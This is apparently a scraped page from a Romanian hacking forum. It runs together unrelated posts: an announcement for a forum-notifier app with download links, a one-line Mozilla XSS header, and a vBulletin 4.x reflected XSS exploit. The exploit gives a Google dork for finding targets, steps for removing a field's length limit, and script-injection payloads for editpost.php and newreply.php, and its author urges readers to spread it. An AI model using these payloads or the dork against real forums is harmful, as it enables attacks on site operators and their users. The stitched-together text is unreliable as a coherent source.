Leaderboard

[RST] Post Hunter este o aplicatie care iti permite sa "tragi cu ochil" la ce se intampla pe RST atunci cand lucrezi la un proiect/programezi si nu ai timp/nu vrei sa iti intrerupi munca. Aplicatia verifica in fiecare minut ultimile postari de pe RST iar atunci cand apare un post/comentariu nou creaza un Baloon Tip : Acel Baloon Tip va sta acolo 4 secunde. Daca dai click pe Baloon Tip acesta te va duce catre postul/comentariul respectiv in functie de setarile care le faci in aplicatie : Click pe rotita pentru a face setarile! //UPDATE Setarile sunt salvate in registry. Evitati sa selectati prea multe categorii. Download : https://www.dropbox.com/s/xs8vwmj8w62mk2v/%5BRST%5D%20Post%20Hunter.rar Va rog sa raportati eventualele erori de programare. Sper sa va fie de folos. // Aplicatia este facuta in .NET folosind Framework 2.0 3/21/2014 Sursa Post Hunter (pass "hunter"): https://www.dropbox.com/s/bnhd641yovspf3h/RST%20Post%20Hunter%202.rar

# Exploit: *.mozilla.org - Cross-Site-Scripting Reflected # Author: akkiliON # URL Link: https://mozilla.org # PoC: Reported

Dupa mai multe mesaje primite, am decis sa public vulnerabilitatile gasite in vBulletin, poate unii o sa se bucure, altii nu. Acesta fiind primul meu exploit, sper sa va placa. Eu zic sa raspandim exploit-ul, facem putina reclama RST-ului. ########################################################################################## # -#-#- vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities -#-#- # -#-#- RSTforums.com -#-#- # # # • Exploit Title: vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities - Reflected # • Google Dork: "Powered by vBulletin® Version 4.x.x" # • Date: 13.08.2013 # • Exploit Author: Sensi # • Website: RSTforums.com # • Software Link: http://vbulletin.com/ # • Version: vBulletin 4.x.x # • Tested on: Linux & Windows # • Special thanks to: [URL="https://rstforums.com/forum/members/kalash1337/"]Kalash1337 [/URL] # ########################################################################################## # # ### First XSS ### # # Step 1: Go to -> Any post -> Press Editpost(advanced editor) -> Inspect 'title' element source and delete maxlength="85" # (Direct Link:) [url]http://localhost/[/url][path]/editpost.php?p=[post number]&do=editpost # # Step 2: Add a malicious vector on title element. # (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script> # #________________________________________________________________________________________ #======================================================================================== #---------------------------------------------------------------------------------------- # # ### Second XSS ### # # Step 1: Go to -> Any thread -> Press post new reply(advanced editor) -> Inspect 'title' element source and delete maxlength="85" # (Direct Link:) [url]http://localhost/[/url][path]/newreply.php?p=[post number]&noquote=1 # # Step 2: Add a malicious vector on title element. # (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script> ########################################################################################## # # # Author will be not responsible for any damage caused! User assumes all responsibility. # # ##########################################################################################